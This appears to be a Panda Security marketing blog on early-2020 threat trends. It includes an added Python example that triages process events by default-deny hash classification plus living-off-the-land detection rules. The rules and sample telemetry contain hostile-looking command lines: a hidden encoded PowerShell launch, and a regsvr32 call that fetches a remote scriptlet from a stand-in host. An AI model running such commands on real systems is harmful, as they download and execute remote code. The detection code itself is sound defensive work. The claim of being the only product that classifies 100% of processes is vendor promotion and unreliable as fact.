The cybersecurity landscape never stops evolving, and both the scope and the speed of that evolution keep increasing and becoming less predictable. Antivirus solutions based on static signatures and generic or heuristic detection are not enough to deal with the flood of new, highly sophisticated malware variants, which continue to infect the systems of companies with weaker protection.
Fortunately, as cyberthreats evolve, so does cybersecurity technology. IT security solutions employ a range of capabilities designed to keep networks from being infiltrated, to detect and stop suspicious behavior, and to get ahead of future intrusions. In a landscape of endless unknowns, what should cybersecurity look like?
At PandaLabs, Panda Security's security laboratory, we registered and analyzed 14.9 million malware events in 2019, stopping 7.9 million potentially unwanted programs (PUPs) and raising 76,000 alerts for exploits that attempted to leverage vulnerabilities in applications, networks, or hardware. We used this data to compile the main cybersecurity threats and trends in our report, which covers the leading cybercriminal techniques and what you can do to stop them.
This data reinforces the idea behind our cybersecurity model: reactive security is no longer enough. There are too many threats and too many attack vectors in any IT environment, any of which can cause a breach. Today, cybersecurity solutions must be predictive, proactive, and prepared to respond to any incident that arises.
The main cybersecurity technology trends in Q1 2020
Cybercriminals are increasingly stealthy, eagerly exploiting mistakes, hiding their movements, and evading detection technologies, especially in the cloud, in mobile applications, and on networks.
Cybercriminals are essentially after three things:
- Financial gain, using ransomware to extort money from victims in return for restoring access to their data
- Data, which can be sold on the dark web
- Control of infrastructure, networks, or other important systems. This access is sold to influential entities, such as nation states, political groups, paramilitary factions, and others.
How do they manage to do this? Some of the main cyberthreats of the start of this year are:
- Ransomware, the notorious malware category, persists. A single click is enough to paralyze an entire network; modern ransomware disables security controls and destroys backups in order to make as big an impact as possible in the shortest possible time. Any kind of organization can fall victim, as we saw a few months ago in the wave of attacks that hit public and private institutions around the world.
- Fileless attacks are a growing concern: they are harder to detect and let cybercriminals operate more stealthily. Attackers no longer necessarily need to drop a file to break into a network; instead they abuse tools already present on the system, as we have analyzed in the Living-off-the-Land attacks we registered.
- Proactive threat hunting is now essential for recognizing abnormal and malicious behavior that abuses trusted applications, since such activity is invisible to purely file-based detection.
- Cybersecurity solutions can no longer rely on a single technology: they require a layered approach combined with a zero-trust posture to stop possible breaches. Layered technologies provide the control, visibility, and flexibility needed in the dynamic fight against unknown attackers. Certified solutions such as Panda Adaptive Defense determine whether devices are running trusted endpoint security applications.
There are ever more interconnected endpoints, from workstations to laptops and servers. All of them require an approach that combines an endpoint protection platform (EPP) with endpoint detection and response (EDR), built on a zero-trust security posture and backed by artificial intelligence. Applying these technologies to cybersecurity changes how the industry addresses cyberthreats. The model rests on the idea of goodware: known, registered, and classified processes are allowed to run on the endpoint, while unknown and malicious processes are not (a default-deny stance).
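The two ideas in the bullets above, default-deny execution of anything not yet classified as goodware and behavioral hunting for trusted binaries being abused in Living-off-the-Land attacks, fit together in one triage routine. The following is an added example, not Panda Security's code or Adaptive Defense's logic: the hashes, process events, rule patterns, process names and the example.invalid URL are all constructed for illustration.

```python
"""Default-deny process classification plus living-off-the-land checks.

Added example, not Panda Security code. Models two layers:
  1. hash classification: goodware runs, malware and unknown code is blocked
     until classified (default deny);
  2. behavioral rules applied to goodware that attackers commonly abuse
     (LOLBins), because a trusted hash says nothing about how it is driven.
All hashes, events and patterns below are constructed for illustration.
"""
from __future__ import annotations

import hashlib
import re
from dataclasses import dataclass


def _h(content: bytes) -> str:
    """Stand-in for hashing the image on disk (inputs are constructed)."""
    return hashlib.sha256(content).hexdigest()


# Constructed classification database: hash -> label.
GOODWARE = {
    _h(b"constructed image: powershell.exe"): "powershell.exe",
    _h(b"constructed image: regsvr32.exe"): "regsvr32.exe",
    _h(b"constructed image: excel.exe"): "excel.exe",
}
MALWARE = {
    _h(b"constructed image: dropper.exe"): "constructed dropper",
}

# Living-off-the-land patterns: trusted binaries driven the way attackers
# favour. Textbook cases only; a production rule set is much larger.
LOTL_RULES = [
    ("powershell_encoded",
     re.compile(r"powershell.*\s-(e|ec|enc|encodedcommand)\s", re.I)),
    ("powershell_download",
     re.compile(r"powershell.*(downloadstring|downloadfile|invoke-webrequest)", re.I)),
    ("regsvr32_remote_scriptlet", re.compile(r"regsvr32.*/i:https?://", re.I)),
    ("mshta_remote", re.compile(r"mshta.*https?://", re.I)),
    ("certutil_download", re.compile(r"certutil.*-urlcache", re.I)),
]
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


@dataclass
class ProcessEvent:
    pid: int
    image: str
    sha256: str
    parent_image: str
    cmdline: str


def classify(sha256: str) -> str:
    """Hash-based verdict: goodware, malware, or unknown."""
    if sha256 in GOODWARE:
        return "goodware"
    if sha256 in MALWARE:
        return "malware"
    return "unknown"


def lotl_findings(ev: ProcessEvent) -> list[str]:
    """Behavioral rules that fire even when the binary itself is trusted."""
    hits = [name for name, rx in LOTL_RULES if rx.search(ev.cmdline)]
    # Structural rule: an Office document spawning a shell is a classic
    # macro-driven fileless entry point.
    if ev.parent_image.lower() in OFFICE_PARENTS and ev.image.lower() in SHELLS:
        hits.append("office_spawns_shell")
    return hits


def decide(ev: ProcessEvent) -> str:
    """Default deny first, then behavioral checks on what is allowed to run."""
    verdict = classify(ev.sha256)
    if verdict == "malware":
        return "block:malware"
    if verdict == "unknown":
        # Unknown code does not execute until it has been classified.
        return "block:unknown"
    hits = lotl_findings(ev)
    return "alert:lotl:" + ",".join(hits) if hits else "allow"


def triage(events: list[ProcessEvent]) -> dict[int, str]:
    return {ev.pid: decide(ev) for ev in events}


# Constructed telemetry: one benign launch, two LOLBin abuses, one known
# dropper, one never-seen binary. The base64 blob is a placeholder.
SAMPLE_EVENTS = [
    ProcessEvent(100, "excel.exe", _h(b"constructed image: excel.exe"),
                 "explorer.exe", "excel.exe C:\\Users\\a\\invoice.xlsm"),
    ProcessEvent(101, "powershell.exe", _h(b"constructed image: powershell.exe"),
                 "excel.exe", "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"),
    ProcessEvent(102, "regsvr32.exe", _h(b"constructed image: regsvr32.exe"),
                 "cmd.exe", "regsvr32.exe /s /n /u /i:http://example.invalid/a.sct scrobj.dll"),
    ProcessEvent(103, "dropper.exe", _h(b"constructed image: dropper.exe"),
                 "explorer.exe", "dropper.exe"),
    ProcessEvent(104, "updater.exe", _h(b"constructed image: updater.exe"),
                 "explorer.exe", "updater.exe /silent"),
]

if __name__ == "__main__":
    for pid, decision in triage(SAMPLE_EVENTS).items():
        print(pid, decision)
```

The ordering matters: the hash check runs first because it is cheap and decisive, and the behavioral rules only ever see processes that the allowlist has already admitted. That is exactly the gap the threat-hunting bullet describes, since a signed `powershell.exe` launched by a spreadsheet with an encoded command is goodware by hash and hostile by behavior.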
Conclusions: the advantages of multilayer protection
The latest threats require cybersecurity that has evolved from single-technology solutions to multi-layer solutions that employ behavior-based monitoring, among other features, to eliminate persistent threats, fileless attacks, and other malicious activity.
The result is a layered technology model combined with a zero-trust security posture that does not let any unknown process run on any endpoint on the network. This model provides two main advantages:
- Security teams do not have to run in-depth analyses of alerts themselves. Running such analyses manually could mean employing more staff or leaving alerts unverified, which raises the security risk.
- If a security team has to verify these alerts manually, its MTTD and MTTR (mean time to detect and mean time to respond) will be higher than with automated classification. Delaying a decision even by a few minutes can seriously worsen the effect of an attack or data breach.
Discover all the advantages of the only solution on the market that classifies 100% of running processes on computers. You can also find out which countries have been worst hit by different malware families, as well as other data analyzed by PandaLabs, here: